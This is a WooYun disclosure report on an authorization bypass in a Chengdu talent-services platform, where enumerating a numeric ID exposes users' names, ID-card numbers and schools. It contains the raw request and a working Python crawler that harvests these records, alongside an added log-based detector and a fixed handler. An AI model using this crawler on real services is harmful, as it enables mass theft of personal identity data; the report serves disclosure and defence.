Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0103899

Title: Privilege bypass on a talent-services platform leaks a large amount of personal information

Related vendor: cncert (National Internet Emergency Center)

Author: 路人甲

Submitted: 2015-03-27 17:09

Fixed: 2015-05-16 13:32

Published: 2015-05-16 13:32

Vulnerability type: unauthorized access / privilege bypass

Severity: High

Self-assessed Rank: 16

Status: handed to a third-party partner organisation (cncert, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-03-27: details sent to the vendor, awaiting vendor handling
2015-04-01: vendor confirmed; details visible to the vendor only
2015-04-11: details opened to core white hats and domain experts
2015-04-21: details opened to regular white hats
2015-05-01: details opened to intern white hats
2015-05-16: details opened to the public

Brief description:

An unauthorized (privilege-bypass) operation leaks a large volume of users' private information.

Details:

Chengdu Talent Services Platform, URL

http://i.rc114.com


As shown in the screenshot, register an account, log in as a legitimate user and edit the personal information page.

[Screenshot: 1.png]


The browser then sends the following HTTP POST request:

POST /RealNameRegistration.aspx/getRealNameInfoByPno HTTP/1.1
Host: i.rc114.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://i.rc114.com/RealNameRegistration.aspx
Content-Length: 15
Cookie: Hm_lvt_57c48c2407b9363122624c39f3e251df=1415000092,1415061514,1415150093; Hm_lvt_fe01b1430376b312631b121e55200580=1427341437; ASP.NET_SessionId=xf5zmts1my1232weeitx03lv; Hm_lpvt_fe01b1430376b312631b121e55200580=1427341473
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
{ pno:'595000'}


However, the pno above can simply be enumerated starting from 1; each value returns another person's registration information, including name, ID-card number, school graduated from and so on. Roughly 600,000 (60w) records are affected.
A PoC that fetches the data slowly:

import httplib, time, codecs

def crawl(strnum, file, id):
    # Request body in the same loose form the page itself sends: { pno:<number>}
    paramTemplate = '''
{ pno:%s}'''
    body = paramTemplate % strnum
    headers = {
        'Host': 'i.rc114.com',
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0',
        'Accept': 'application/json, text/javascript, */*; q=0.01',
        'Accept-Language': 'zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3',
        'Accept-Encoding': 'gzip, deflate',
        'Content-Type': 'application/json; charset=utf-8',
        'X-Requested-With': 'XMLHttpRequest',
        'Referer': 'http://i.rc114.com/RealNameRegistration.aspx',
        'Content-Length': str(len(body)),
        'Cookie': 'Hm_lvt_57c48c2407b9363122624c39f3e251df=1415000092,1415061514; Hm_lvt_fe01b1430376b312631b121e55200580=1415002633,1415003018,1415061505; ASP.NET_SessionId=53k2lzvxa41kle5rxw2qxz1d; Hm_lpvt_fe01b1430376b312631b121e55200580=1415083567; Hm_lpvt_57c48c2407b9363122624c39f3e251df=1415061514',
        'Connection': 'keep-alive', 'Pragma': 'no-cache', 'Cache-Control': 'no-cache' }
    try:
        conn = httplib.HTTPConnection('i.rc114.com', 80)
        conn.request('POST', '/RealNameRegistration.aspx/getRealNameInfoByPno', body, headers)
        response = conn.getresponse()
        print response.status, response.reason
        data = response.read().decode('UTF-8')
        # Append the raw JSON reply for this id to the output file
        file.write('id=%s:' % id)
        file.write(data)
        file.write('\n------------------------------------------------\n')
        conn.close()
    except httplib.HTTPException, e:
        print e
        return 1   # non-zero tells the caller to retry this pno
    return 0

def main():
    f = codecs.open('db.txt', 'a', 'utf_16')
    for i in range(600000, 600010):
        strnum = str(i + 1)
        while crawl(strnum, f, str(i)):
            pass
        time.sleep(10)   # deliberately slow: one request every ten seconds
    f.close()

if __name__ == '__main__':
    main()
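Added example (not part of the report, and not the platform's or the author's code): the PoC above walks pno values one at a time from a single session, which leaves a recognisable trace in access logs. The detection logic below uses a constructed log format with assumed field names and flags sessions that read many distinct, consecutive pno values, while leaving alone a user who only touches their own record.

```python
import re
from collections import defaultdict

# Constructed sample log lines (illustrative format, not the site's real logs):
# session A looks up its own record twice, session B walks pno 600001..600006 in
# order, session C touches five unrelated records with no consecutive run.
SAMPLE_LOG = """\
2015-03-26 10:04:01 sess=A POST /RealNameRegistration.aspx/getRealNameInfoByPno pno=595000
2015-03-26 10:05:01 sess=A POST /RealNameRegistration.aspx/getRealNameInfoByPno pno=595000
2015-03-26 10:04:11 sess=B POST /RealNameRegistration.aspx/getRealNameInfoByPno pno=600001
2015-03-26 10:04:21 sess=B POST /RealNameRegistration.aspx/getRealNameInfoByPno pno=600002
2015-03-26 10:04:31 sess=B POST /RealNameRegistration.aspx/getRealNameInfoByPno pno=600003
2015-03-26 10:04:41 sess=B POST /RealNameRegistration.aspx/getRealNameInfoByPno pno=600004
2015-03-26 10:04:51 sess=B POST /RealNameRegistration.aspx/getRealNameInfoByPno pno=600005
2015-03-26 10:05:01 sess=B POST /RealNameRegistration.aspx/getRealNameInfoByPno pno=600006
2015-03-26 10:06:01 sess=C POST /RealNameRegistration.aspx/getRealNameInfoByPno pno=1
2015-03-26 10:06:11 sess=C POST /RealNameRegistration.aspx/getRealNameInfoByPno pno=50
2015-03-26 10:06:21 sess=C POST /RealNameRegistration.aspx/getRealNameInfoByPno pno=3000
2015-03-26 10:06:31 sess=C POST /RealNameRegistration.aspx/getRealNameInfoByPno pno=7
2015-03-26 10:06:41 sess=C POST /RealNameRegistration.aspx/getRealNameInfoByPno pno=99
"""

LINE_RE = re.compile(r"sess=(\S+) \S+ \S*getRealNameInfoByPno pno=(\d+)")

def longest_consecutive_run(ids):
    """Length of the longest run of consecutive integers in the set `ids`."""
    ordered = sorted(ids)
    longest = run = 1 if ordered else 0
    for a, b in zip(ordered, ordered[1:]):
        run = run + 1 if b == a + 1 else 1
        longest = max(longest, run)
    return longest

def enumeration_suspects(log_text, min_distinct=5, min_run=4):
    """Sessions that fetched at least `min_distinct` different pno values AND
    at least `min_run` of them consecutively: the signature of an ID walk.
    A user editing their own profile only ever touches one pno."""
    per_session = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m:
            per_session[m.group(1)].add(int(m.group(2)))
    suspects = {}
    for sess, ids in per_session.items():
        run = longest_consecutive_run(ids)
        if len(ids) >= min_distinct and run >= min_run:
            suspects[sess] = {"distinct": len(ids), "longest_run": run}
    return suspects
```

Thresholds are tunable; a slow walk like the PoC's one request per ten seconds is still caught because the check counts distinct ids per session rather than request rate.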

Proof:

Using the PoC above, roughly 600,000 (60w) user registration records can be obtained, including name, ID-card number, school, major and so on.


Fix recommendation:

Add authorization checks.
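As an added illustration of the recommended fix (example code, not the platform's own), the handler below is written twice: the vulnerable form that only checks for a logged-in session, and the fixed form that enforces object-level authorization by tying the requested pno to the session that owns it. The record store, session table and names are constructed placeholders.

```python
import json
import re

# Constructed record store keyed by personnel number (pno); values are placeholders.
RECORDS = {
    "595000": {"name": "user A", "idcard": "[placeholder]", "gradschool": "school A"},
    "595001": {"name": "user B", "idcard": "[placeholder]", "gradschool": "school B"},
}
# Constructed session table: session id -> pno of the account that logged in.
SESSIONS = {"sess-A": "595000", "sess-B": "595001"}

class Forbidden(Exception):
    """Raised when the caller may not see the requested record."""

def parse_pno(body):
    """The endpoint accepted a loose body such as { pno:'595000'}; try strict JSON
    first, fall back to that relaxed form, and normalise the value to a string."""
    try:
        return str(json.loads(body)["pno"])
    except (ValueError, KeyError, TypeError):
        m = re.search(r"pno\s*:\s*['\"]?(\d+)", body)
        if not m:
            raise ValueError("no pno in request body")
        return m.group(1)

def get_real_name_info_vulnerable(session_id, body):
    """Mirrors the reported behaviour: any logged-in session may fetch any pno."""
    if session_id not in SESSIONS:
        raise Forbidden("login required")
    return RECORDS.get(parse_pno(body))

def get_real_name_info_fixed(session_id, body):
    """Object-level authorisation: the pno in the request must be the one bound
    to the session. If users only ever edit their own record, ignoring the
    client-supplied pno and always using the session's is simpler still."""
    owner_pno = SESSIONS.get(session_id)
    if owner_pno is None:
        raise Forbidden("login required")
    requested = parse_pno(body)
    if requested != owner_pno:
        # Worth logging: a mismatch here is exactly what an enumeration attempt looks like.
        raise Forbidden("pno %s is not owned by this session" % requested)
    return RECORDS[owner_pno]
```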

Copyright notice: when republishing, credit the source as 路人甲@乌云 (WooYun).


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 9

Confirmed: 2015-04-01 13:31

Vendor reply:

CNVD has confirmed and reproduced the described situation; it has been forwarded via CNCERT to the Sichuan branch center, which will coordinate handling with the website's operating unit.

Latest status:

None yet